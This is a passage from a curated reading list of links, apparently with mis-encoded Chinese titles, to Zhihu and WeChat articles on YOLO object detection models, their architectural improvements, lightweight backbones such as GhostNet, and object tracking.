[2020-08-17๏ผŒไฝ ไธ€ๅฎšไปŽๆœช็œ‹่ฟ‡ๅฆ‚ๆญค้€šไฟ—ๆ˜“ๆ‡‚็š„YOLO็ณปๅˆ—(ไปŽv1ๅˆฐv5)ๆจกๅž‹่งฃ่ฏป (ไธ‹)](https://zhuanlan.zhihu.com/p/186014243) - [็ŸฅไนŽใ€ŒCVๆŠ€ๆœฏๆŒ‡ๅ—ใ€| ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVๆŠ€ๆœฏๆŒ‡ๅ—ใ€](https://www.zhihu.com/people/cvji-zhu-zhi-nan) - [2021-08-26๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹mAP็š„่ฎก็ฎ— & COCO็š„่ฏ„ไปทๆŒ‡ๆ ‡](https://mp.weixin.qq.com/s/gpr7JZMRgp8B5RxhVzt_mQ) - [2022-04-07๏ผŒYOLO็ณปๅˆ—ๆขณ็†๏ผˆไธ€๏ผ‰YOLOv1-YOLOv3](https://zhuanlan.zhihu.com/p/494572914) - [2022-04-15๏ผŒYOLO็ณปๅˆ—ๆขณ็†ไธŽๅคไน ๏ผˆไบŒ๏ผ‰YOLOv4 ](https://mp.weixin.qq.com/s/2lndImcah5QJJJiEujGOsA) - [2022-04-24๏ผŒYOLO็ณปๅˆ—ๆขณ็†๏ผˆไธ‰๏ผ‰YOLOv5](https://zhuanlan.zhihu.com/p/503971609) - [2022-06-26๏ผŒYOLO็ณปๅˆ—ๆขณ็†๏ผˆไน๏ผ‰ๅˆๅฐๆ–ฐ้ฒœๅ‡บ็‚‰็š„YOLOv6](https://zhuanlan.zhihu.com/p/534090250) - [2022-07-19๏ผŒYOLO็ณปๅˆ—ๆขณ็†๏ผˆๅ๏ผ‰YOLOๅฎ˜ๆ–น้‡ๅ›žๆฑŸๆน– ๅนถๅธฆๆฅไบ†YOLOv7](https://zhuanlan.zhihu.com/p/543574708) - [2023-03-11๏ผŒ็›ฎๆ ‡่ทŸ่ธชไธ“ๆ ๏ผˆไธ€๏ผ‰ๅŸบๆœฌไปปๅŠกใ€ๅธธ็”จๆ–นๆณ•](https://mp.weixin.qq.com/s/DKHOlLtjO2OBtIWlA3cpzg) - [2023-04-17๏ผŒ็›ฎๆ ‡่ทŸ่ธช๏ผˆไบŒ๏ผ‰ๅ•ใ€ๅคš็›ฎๆ ‡่ทŸ่ธช็š„ๅŸบๆœฌๆฆ‚ๅฟตไธŽๅธธ็”จๆ•ฐๆฎ้›†](https://mp.weixin.qq.com/s/N50tOvJwNRZhyoVq6Fc-ig) - [2023-05-11๏ผŒๅ…จๆ–ฐYOLOๆจกๅž‹YOLOCSๆฅๅ•ฆ | ้ข้ขไฟฑๅˆฐๅœฐๆ”น่ฟ›YOLOv5็š„Backbone/Neck/Head](https://mp.weixin.qq.com/s/wnxOd-DukIpea5j2Dqcpbw) - [2024-04-16๏ผŒYOLC ๆฅ่ขญ | ้ฅ้ฅ้ข†ๅ…ˆ ๏ผYOLOไธŽCenterNetๆ€ๆƒณ็ซ่Šฑ็ขฐๆ’ž๏ผŒ่ฎฉๅฐ็›ฎๆ ‡็š„ๆฃ€ๆต‹ๆ€ง่ƒฝๅŽŸๅœฐ่ตท้ฃž๏ผŒ่ฝๅœฐไปทๅ€ผๆžๅคง !](https://mp.weixin.qq.com/s/cCegxKb1VWxmhpZZwCk1WA) - [็ŸฅไนŽใ€Œๆžๅธ‚ๅนณๅฐใ€| ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆžๅธ‚ๅนณๅฐใ€](https://www.zhihu.com/org/ji-shi-jiao-14) - [2020-11-17๏ผŒYOLO็ฎ—ๆณ•ๆœ€ๅ…จ็ปผ่ฟฐ๏ผšไปŽYOLOv1ๅˆฐYOLOv5](https://zhuanlan.zhihu.com/p/297965943) - [2022-08-04๏ผŒๅŽไธบ่ฝป้‡็บง็ฅž็ป็ฝ‘็ปœๆžถๆž„GhostNetๅ†ๅ‡็บง๏ผŒGPUไธŠๅคงๆ˜พ่บซๆ‰‹็š„G-GhostNet๏ผˆIJCV22๏ผ‰](https://mp.weixin.qq.com/s/31Fb3WSBtRUNu8oUkMrBrg) - [2022-10-17๏ผŒBackbone็ฏ‡๏ฝœYOLOv1-v7ๅ…จ็ณปๅˆ—ๅคง่งฃๆž](https://mp.weixin.qq.com/s/SQ-ojaRlinLY5PsLTZhz2w) - [2022-11-15๏ผŒNeurIPS'22 Spotlight๏ฝœๅŽไธบ่ฏบไบšGhostNetV2ๅ‡บ็‚‰๏ผš้•ฟ่ท็ฆปๆณจๆ„ๅŠ›ๆœบๅˆถๅขžๅผบๅป‰ไปทๆ“ไฝœ](https://mp.weixin.qq.com/s/RBpC-0HqzgtHy5xsoBce8Q) - [2022-11-21๏ผŒ่ฝป้‡็บง็š„CNNๆจกๅ—๏ผRepGhost๏ผš้‡ๅ‚ๆ•ฐๅŒ–ๆŠ€ๆœฏๆž„ๅปบ็กฌไปถ้ซ˜ๆ•ˆ็š„ Ghost ๆจกๅ—](https://mp.weixin.qq.com/s/mV2Bl4tBZwZ7n-YleMUE4g) - [2023-02-26๏ผŒๅŽฆๅคง็บช่ฃๅต˜ๅ›ข้˜Ÿๆ–ฐไฝœ๏ฝœOneTeacher: ่งฃ้” YOLOv5 ็š„ๆญฃ็กฎๆ‰“ๅผ€ๆ–นๅผ](https://mp.weixin.qq.com/s/HAfCpECOxccPfj5b7Pprfw) - [2023-04-18๏ผŒRepvgg-style ConvNets๏ผŒ็กฌไปถๅ‹ๅฅฝ๏ผ่ฏฆ่งฃYOLOv6็š„้ซ˜ๆ•ˆbackbone๏ผšEfficientRep](https://mp.weixin.qq.com/s/2Md30QdqgWnWwVR7d4sx1Q) - [2023-04-19๏ผŒCVPR23 Highlight๏ฝœๆ‹ฅๆœ‰top-down attention่ƒฝๅŠ›็š„vision transformer](https://mp.weixin.qq.com/s/UMA3Vk9L71zUEtNkCshYBg) - [2023-04-26๏ผŒไธ‡ๅญ—้•ฟๆ–‡๏ผŒๆทฑๅบฆๅ…จ้ข่งฃ่ฏปPyTorchๅ†…้ƒจๆœบๅˆถ](https://mp.weixin.qq.com/s/JYsJRo8l5-nTFrGwBV-BFA) - [2023-05-28๏ผŒYOLOv10ๅผ€ๆบ๏ฝœๆธ…ๅŽ็”จ็ซฏๅˆฐ็ซฏYOLOv10ๅœจ้€Ÿๅบฆ็ฒพๅบฆไธŠ้ƒฝ็”ŸๅƒYOLOv8ๅ’ŒYOLOv9](https://mp.weixin.qq.com/s/VG9itVaOwCpmb48ZAa8Mjw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒWeThinklnใ€ - [2022-09-18๏ผŒใ€Make YOLO Great Againใ€‘YOLOv1-v7ๅ…จ็ณปๅˆ—ๅคง่งฃๆž๏ผˆ่พ“ๅ…ฅไพง็ฏ‡๏ผ‰](https://mp.weixin.qq.com/s/JLYFP8IA7RcIMSeBKekQlw) - [2022-07-31๏ผŒใ€Make YOLO Great Againใ€‘YOLOv1-v7ๅ…จ็ณปๅˆ—ๅคง่งฃๆž๏ผˆNeck็ฏ‡๏ผ‰](https://mp.weixin.qq.com/s/nEWL9ZAYuVngoejf-muFRw) - [2022-08-14๏ผŒใ€Make YOLO Great Againใ€‘YOLOv1-v7ๅ…จ็ณปๅˆ—ๅคง่งฃๆž๏ผˆHead็ฏ‡๏ผ‰๏ผˆๅฐ้ฒœ็‰ˆ๏ผ‰](https://mp.weixin.qq.com/s/JDaSWyNdLoHc6j6cOmNIWw) - [2022-08-28๏ผŒใ€Make YOLO Great Againใ€‘YOLOv1-v7ๅ…จ็ณปๅˆ—ๅคง่งฃๆž๏ผˆHead็ฏ‡๏ผ‰๏ผˆๅฎŒๆ•ด็‰ˆ๏ผ‰](https://mp.weixin.qq.com/s/85Xh4l_t65HrGx25ByD_iw) - [2022-10-16๏ผŒใ€Make YOLO Great Againใ€‘YOLOv1-v7ๅ…จ็ณปๅˆ—ๅคง่งฃๆž๏ผˆBackbone็ฏ‡๏ผ‰](https://mp.weixin.qq.com/s/T76JkDf82ZPF5WWVDvJ6GA) - [2022-11-13๏ผŒใ€Make YOLO Great Againใ€‘YOLOv1-v7ๅ…จ็ณปๅˆ—ๅคง่งฃๆž๏ผˆTricks็ฏ‡๏ผ‰](https://mp.weixin.qq.com/s/xJDMKcS9SRQIWKCAbUpMaQ) - [2022-12-11๏ผŒใ€Make YOLO Great Againใ€‘YOLOv1-v7ๅ…จ็ณปๅˆ—ๅคง่งฃๆž๏ผˆๆฑ‡ๆ€ป็ฏ‡๏ผ‰](https://mp.weixin.qq.com/s/etaaojeNv8lbBy586FjtQw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒGiantPandaCVใ€ - [2022-10-26๏ผŒOne-YOLOv5 ๅ‘ๅธƒ๏ผŒไธ€ไธช่ฎญๅพ—ๆ›ดๅฟซ็š„YOLOv5](https://mp.weixin.qq.com/s/tZ7swUd0biz7G3CiRkHHfw) - [2022-12-04๏ผŒOne-YOLOv5 v1.1.0ๅ‘ๅธƒ๏ผŒๅคงๅน…ไผ˜ๅŒ–Eager FP32ๅ•ๅกๆ€ง่ƒฝ](https://mp.weixin.qq.com/s/N2Xp4IKJAATCmmmQqQ6new) - [2022-10-28๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ไธ€๏ผŒ็ฝ‘็ปœ็ป“ๆž„้€่กŒไปฃ็ ่งฃๆž](https://mp.weixin.qq.com/s/qR2ODIMidsNR_Eznxry5pg) - [2022-11-06๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ไบŒ๏ผŒYOLOv5ๆ•ฐๆฎ้›†็ป“ๆž„่งฃๆž&ๅฆ‚ไฝ•ๅˆถไฝœไธ€ไธชๅฏไปฅ่Žทๅพ—ๆ›ดๅฅฝ่ฎญ็ปƒๆ•ˆๆžœ็š„ๆ•ฐๆฎ้›†](https://mp.weixin.qq.com/s/qDNjLKhkjDT54l06SQ_yEA) - [2022-11-10๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ไธ‰๏ผŒIoUๆทฑๅ…ฅ่งฃๆž](https://mp.weixin.qq.com/s/1DYz8sp1xR91rr7Q5_X4Qw) - [2022-11-12๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ๅ››๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹็ฒพ็กฎๅบฆ่ฏ„ไผฐ](https://mp.weixin.qq.com/s/n6ziYYc3BBsobcRkMS9tsQ) - [2022-11-18๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ไบ”๏ผŒ่ฎก็ฎ—mAP็”จๅˆฐ็š„numpyๅ‡ฝๆ•ฐ่ฏฆ่งฃ](https://mp.weixin.qq.com/s/i8Ygm9BCWNQfyBya7f1Z8Q) - [2022-11-20๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ๅ…ญ๏ผŒYOLOv5ไฝฟ็”จๆ•™็จ‹่ฏฆ่งฃ๏ผˆๅ•ๅก๏ผŒๅคšๅก๏ผŒๅคšๆœบ่ฎญ็ปƒ๏ผ‰](https://mp.weixin.qq.com/s/B1q_XsvXpf-fI3vDedoWjA) - [2022-11-22๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ไธƒ๏ผŒไฝฟ็”จๆจกๅž‹่žๅˆๆๅ‡mAPๅ’ŒmAR](https://mp.weixin.qq.com/s/6UvHK0bRxHGk__B8YMQhiw) - [2022-11-27๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ๅ…ซ๏ผŒๅฐ†่ฎญ็ปƒๅฅฝ็š„YOLOv5ๆƒ้‡ๅฏผๅ‡บไธบๅ…ถๅฎƒๆก†ๆžถๆ ผๅผ](https://mp.weixin.qq.com/s/UoPY_0E0D5g0R5o5eVmbdA) - [2022-11-29๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ไน๏ผŒtrain.py ้€ไปฃ็ ่งฃๆž](https://mp.weixin.qq.com/s/4jOg6De01Yxl1uW-v9Zydg) - [2022-12-07๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ๅ๏ผŒYOLOv5 ็š„ W & B ็ง‘ๅญฆๅฎž้ชŒๅทฅๅ…ทๆ•™็จ‹](https://mp.weixin.qq.com/s/CZ1btWU9cpbJWC2eVLBVQQ) - [2022-12-08๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹ๅไธ€๏ผŒYOLOv5 ๆ•ฐๆฎๅขžๅผบๆจกๅ— utils/augmentations.py ้€่กŒ่งฃๆž](https://mp.weixin.qq.com/s/uouLlV1G35L8_DQaUm8ogg) - [2022-12-14๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹โ€‹ๅไบŒ๏ผŒLoss ่ฎก็ฎ—่ฏฆ็ป†่งฃๆž](https://mp.weixin.qq.com/s/WfXSQFHgF6Ouwq5re4n1Vw) - [2022-12-29๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹โ€‹ๅไธ‰๏ผŒdownloads.py ่ฏฆ็ป†่งฃๆž](https://mp.weixin.qq.com/s/Efa44D7PiwaZkN0jlf4R_w) - [2023-01-10๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹โ€‹ๅๅ››๏ผŒYOLOv5 autoanchor ๆœบๅˆถ่ฏฆ่งฃ](https://mp.weixin.qq.com/s/qC-E2UbjNZT-c04IpXfoYA) - [2023-02-07๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹โ€‹ๅไบ”๏ผŒYOLOv5 Callbackๆœบๅˆถ่งฃ่ฏป](https://mp.weixin.qq.com/s/osGwscIawS9q07g21rTQcA) - [2023-02-18๏ผŒใ€ŠYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹ใ€‹โ€‹ๅๅ…ญ๏ผŒval.py ๆบ็ ่งฃ่ฏป](https://mp.weixin.qq.com/s/sa2MQIaPIkHHxoVRGYMTAw) - [2023-04-24๏ผŒ็ฎ€ๅ•่Š่Š็›ฎๆ ‡ๆฃ€ๆต‹ๆ–ฐ่ŒƒๅผRT-DETR็š„้ชจๅนฒ๏ผšHGNetv2](https://mp.weixin.qq.com/s/gF_qfXPMvPKWGNoEFdnpHw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒPandaCVerใ€ - [2022-10-18๏ผŒๆ”น่ฟ›YOLOv5โ€”โ€”้ญ”ๆ”นYOLOv5ๆๅ‡ๆฃ€ๆต‹็ฒพๅบฆ](https://mp.weixin.qq.com/s/1iP4H3Ri6uBkq24eOO-viw) - [2022-10-23๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5&ๆ— ๅ‚SimAM๏ผ](https://mp.weixin.qq.com/s/X6MIRbE4ZD9xA-c-UtAa_A) - [2022-10-25๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5ๆ”น่ฟ›็ป“ๅˆBotNet๏ผˆTransformer๏ผ‰](https://mp.weixin.qq.com/s/NVkHPBv8Ps2fCB2QvNz59Q) - [2022-10-27๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5/YOLOv7ๆ›ดๆขFReLUๆฟ€ๆดปๅ‡ฝๆ•ฐ](https://mp.weixin.qq.com/s/4KmjOSGAHHFdp6jYZI_QFw) - [2022-10-29๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5/YOLOv7ๆ”น่ฟ›ไน‹GSConv+Slim Neck](https://mp.weixin.qq.com/s/CdNvKCL6fsQD012zrzZNFA) - [2022-11-02๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5/YOLOv7ๆ”น่ฟ›ไน‹็ป“ๅˆCBAM](https://mp.weixin.qq.com/s/vnqnNW5y47XThOmodEWHYA) - [2022-11-07๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5/YOLOv7ๆ”น่ฟ›ไน‹็ป“ๅˆGAMAttention](https://mp.weixin.qq.com/s/9gGOO66I1kFpyZcRayjF_Q) - [2022-11-08๏ผŒไบบๅทฅๆ™บ่ƒฝๅ‰ๆฒฟโ€”โ€”ๆทฑๅบฆๅญฆไน ็ƒญ้—จ้ข†ๅŸŸ๏ผˆ็กฎๅฎš้€‰้ข˜ๅŠ็ ”็ฉถๆ–นๅ‘๏ผ‰](https://mp.weixin.qq.com/s/ETkGaGNLx5VqJVSCSsTJNw) - [2022-11-10๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5/YOLOv7ๆ”น่ฟ›ไน‹็ป“ๅˆโ€‹SOCA๏ผˆๅ•ๅน…ๅ›พๅƒ่ถ…ๅˆ†่พจ็Ž‡๏ผ‰](https://mp.weixin.qq.com/s/ithO0S7R-D8kXH1ZQlpRRQ) - [2022-11-12๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5/YOLOv7ๆ”น่ฟ›ไน‹็ป“ๅˆโ€‹ASPP๏ผˆ็ฉบๆดž็ฉบ้—ดๅท็งฏๆฑ ๅŒ–้‡‘ๅญ—ๅก”๏ผ‰](https://mp.weixin.qq.com/s/QgL2UxbVvXwrfmGxK7uolQ) - [2022-11-16๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5/YOLOv7ๆ”น่ฟ›ไน‹็ป“ๅˆโ€‹RepVGG๏ผˆ้€Ÿๅบฆ้ฃ™ๅ‡๏ผ‰](https://mp.weixin.qq.com/s/4TnHyiG88h5oDhD6NZoq2Q) - [2022-11-20๏ผŒ็Ÿฅ่ฏ†็ป้ชŒๅˆ†ไบซโ€”โ€”YOLOv5-6.0่ฎญ็ปƒๅ‡บ้”™ๅŠ่งฃๅ†ณๆ–นๆณ•๏ผˆRuntimeError๏ผ‰](https://mp.weixin.qq.com/s/9qTFFu7HImaF8t6ozG_NWw) - [2022-11-23๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5/YOLOv7ๆ”น่ฟ›ไน‹็ป“ๅˆNAMAttention๏ผˆๆๅ‡ๆถจ็‚น๏ผ‰](https://mp.weixin.qq.com/s/qB8G_pf3oCYBstYyFPrcrw) - [2022-11-25๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv5/YOLOv7ๆ”น่ฟ›ไน‹็ป“ๅˆCriss-Cross Attention](https://mp.weixin.qq.com/s/v3pOvqz6ZewPR3fjnA5SIg) - [2022-11-29๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”YOLOv7ๆ”น่ฟ›|ๅขžๅŠ ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ๅฑ‚](https://mp.weixin.qq.com/s/cFzcJLOG_1_TzS-Ckg6hGA) - [2022-11-14๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”ๆ”ถ่—|ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹็š„ๅฎšไน‰๏ผˆไธ€๏ผ‰](https://mp.weixin.qq.com/s/RwthaHf5d7-dT31Cqco6MA) - [2022-11-17๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”ๆ”ถ่—|ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹้šพ็‚นๅˆ†ๆž๏ผˆไบŒ๏ผ‰](https://mp.weixin.qq.com/s/E2ZRBPZjobhlLspJK_DTfA) - [2022-11-18๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•โ€”โ€”ๆ”ถ่—|ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹่งฃๅ†ณๆ–นๆกˆ๏ผˆไธ‰๏ผ‰](https://mp.weixin.qq.com/s/nuIfgFX_krLtN9EQGNrn2w) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝAI็ฎ—ๆณ•ๅทฅ็จ‹ๅธˆใ€ - [2023-03-25๏ผŒๆŠ•็จฟๆŒ‡ๅ—๏ผš็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡ๅ†™ไฝœๆจกๆฟ๏ผˆๅˆ็จฟ๏ผ‰](https://mp.weixin.qq.com/s/mi4BIyITyifl7QRhAKqPjg) - [2022-06-26๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ไธ€๏ผšๆทปๅŠ SEๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/QwY5C2y7HZ6LPRHC5gScFg) - [2022-07-11๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ไบŒ๏ผšๆทปๅŠ CBAMๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/pFQEH4zpYogDOMdMQqugcg) - [2022-07-13๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ไธ‰๏ผšๆทปๅŠ Coordinateๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/NzN88Vtkb3rVjsyPi60edQ) - [2022-07-14๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅ››๏ผšๆทปๅŠ ECA้€š้“ๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/4tnD0OZrOn0RdRSY-1XAxw) - [2022-07-15๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ไบ”๏ผšๆ”น่ฟ›็‰นๅพ่žๅˆ็ฝ‘็ปœPANETไธบBIFPN](https://mp.weixin.qq.com/s/CgvdOqRC9JLrWa4mIDT_zA) - [2022-07-16๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅ…ญ๏ผšๅขžๅŠ ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ๅฑ‚](https://mp.weixin.qq.com/s/0IsvGgxhE5USP0c37HzeAQ) - [2022-07-17๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ไธƒ๏ผšๆŸๅคฑๅ‡ฝๆ•ฐๆ”น่ฟ›](https://mp.weixin.qq.com/s/0U4Y_ZEI2YvW1sMHxRfwMQ) - [2022-07-18๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅ…ซ๏ผš้žๆžๅคงๅ€ผๆŠ‘ๅˆถNMS็ฎ—ๆณ•ๆ”น่ฟ›Soft-nms](https://mp.weixin.qq.com/s/Q35jjU6qCKhwsVpF_JkFGw) - [2022-07-19๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ไน๏ผš้”šๆก†K-Means็ฎ—ๆณ•ๆ”น่ฟ›K-Means++](https://mp.weixin.qq.com/s/8tfw3l_qy8IyKKh3njsN_w) - [2022-07-20๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅ๏ผšๆŸๅคฑๅ‡ฝๆ•ฐๆ”น่ฟ›ไธบSIOU](https://mp.weixin.qq.com/s/JMbiPaQKHwIULKLE2jeQNA) - [2022-07-21๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅไธ€๏ผšไธปๅนฒ็ฝ‘็ปœC3ๆ›ฟๆขไธบ่ฝป้‡ๅŒ–็ฝ‘็ปœMobileNetV3](https://mp.weixin.qq.com/s/b3v2zNU4Ek6eO5AajuPI5A) - [2022-07-27๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅไบŒ๏ผšไธปๅนฒ็ฝ‘็ปœC3ๆ›ฟๆขไธบ่ฝป้‡ๅŒ–็ฝ‘็ปœShuffleNetV2](https://mp.weixin.qq.com/s/9E9U64Wl8C02etSE19Q1iw) - [2022-07-28๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅไธ‰๏ผšไธปๅนฒ็ฝ‘็ปœC3ๆ›ฟๆขไธบ่ฝป้‡ๅŒ–็ฝ‘็ปœEfficientNetv2](https://mp.weixin.qq.com/s/SIqZyXfpx67uRxL7OSHqDg) - [2022-07-31๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅๅ››๏ผšไธปๅนฒ็ฝ‘็ปœC3ๆ›ฟๆขไธบ่ฝป้‡ๅŒ–็ฝ‘็ปœGhostnet](https://mp.weixin.qq.com/s/IVR6kJodBWStFcVoVHArEw) - [2022-08-01๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅไบ”๏ผš็ฝ‘็ปœ่ฝป้‡ๅŒ–ๆ–นๆณ•ๆทฑๅบฆๅฏๅˆ†็ฆปๅท็งฏ](https://mp.weixin.qq.com/s/l3F9vGE2DHxz2otrlM1kfw) - [2022-08-03๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅๅ…ญ๏ผšไธปๅนฒ็ฝ‘็ปœC3ๆ›ฟๆขไธบ่ฝป้‡ๅŒ–็ฝ‘็ปœPP-LCNet](https://mp.weixin.qq.com/s/sHCpHtgcMurvgaXjnQX5HQ) - [2022-08-04๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅไธƒ๏ผšCNN+Transformerโ€”โ€”่žๅˆBottleneck Transformers](https://mp.weixin.qq.com/s/-hEjujFJuK5V-i9jX00iFw) - [2022-08-05๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅๅ…ซ๏ผšๆŸๅคฑๅ‡ฝๆ•ฐๆ”น่ฟ›ไธบAlpha-IoUๆŸๅคฑๅ‡ฝๆ•ฐ](https://mp.weixin.qq.com/s/5mwBdny3xI4vZajfZ_KxjQ) - [2022-08-06๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅไน๏ผš้žๆžๅคงๅ€ผๆŠ‘ๅˆถNMS็ฎ—ๆณ•ๆ”น่ฟ›DIoU NMS](https://mp.weixin.qq.com/s/rW9FuDdpNVnO8yQbRon58g) - [2022-08-07๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ไบŒๅ๏ผšInvolutionๆ–ฐ็ฅž็ป็ฝ‘็ปœ็ฎ—ๅญๅผ•ๅ…ฅ็ฝ‘็ปœ](https://mp.weixin.qq.com/s/cn7uQtcPN3S_CHJc_INZaQ) - [2022-08-08๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ไบŒๅไธ€๏ผšCNN+Transformerโ€”โ€”ไธปๅนฒ็ฝ‘็ปœๆ›ฟๆขไธบๅˆๅฟซๅˆๅผบ็š„่ฝป้‡ๅŒ–ไธปๅนฒEfficientFormer](https://mp.weixin.qq.com/s/D21iFLFTMFfM--vsfh0T5w) - [2022-08-09๏ผŒYOLOv7ๆ”น่ฟ›ไน‹ไบŒๅไบŒ๏ผšๆถจ็‚น็ฅžๅ™จโ€”โ€”ๅผ•ๅ…ฅ้€’ๅฝ’้—จๆŽงๅท็งฏ๏ผˆgnConv๏ผ‰](https://mp.weixin.qq.com/s/qq0M1yaCUysp5L3xap6t9g) - [2022-08-24๏ผŒYOLOv7ๆ”น่ฟ›ไน‹ไบŒๅไธ‰๏ผšๅผ•ๅ…ฅSimAMๆ— ๅ‚ๆ•ฐๆณจๆ„ๅŠ›](https://mp.weixin.qq.com/s/AfrIRsNDAbwfVzdz8XwgFw) - [2022-08-27๏ผŒYOLOv7ๆ”น่ฟ›ไน‹ไบŒๅๅ››๏ผšๅผ•ๅ…ฅ้‡ๅญๅฏๅ‘็š„ๆ–ฐๅž‹่ง†่ง‰ไธปๅนฒๆจกๅž‹WaveMLP](https://mp.weixin.qq.com/s/O78PFirnfdfuGlmQRpf9rw) - [2022-09-03๏ผŒYOLOv7ๆ”น่ฟ›ไน‹ไบŒๅไบ”๏ผšๅผ•ๅ…ฅSwin Transformer](https://mp.weixin.qq.com/s/s4RfXjW17mxUSIuK9QvTxg) - [2022-09-19๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไบŒๅๅ…ญ๏ผšๆ”น่ฟ›็‰นๅพ่žๅˆ็ฝ‘็ปœPANetไธบASFF่‡ช้€‚ๅบ”็‰นๅพ่žๅˆ็ฝ‘็ปœ](https://mp.weixin.qq.com/s/Ty8Eo_qbJZMxjTULVVi-xA) - [2022-09-21๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไบŒๅไธƒ๏ผš่งฃๅ†ณๅฐ็›ฎๆ ‡้—ฎ้ข˜โ€”โ€”ๆ กๆญฃๅท็งฏๅ–ไปฃ็‰นๅพๆๅ–็ฝ‘็ปœไธญ็š„ๅธธ่ง„ๅท็งฏ](https://mp.weixin.qq.com/s/o23-u-B2I23bttzp14FJTg) - [2022-09-24๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไบŒๅๅ…ซ๏ผšICLR 2022ๆถจ็‚น็ฅžๅ™จโ€”โ€”ๅณๆ’ๅณ็”จ็š„ๅŠจๆ€ๅท็งฏODConv](https://mp.weixin.qq.com/s/-wH_N4-pXY08XdbJ-Iu8zA) - 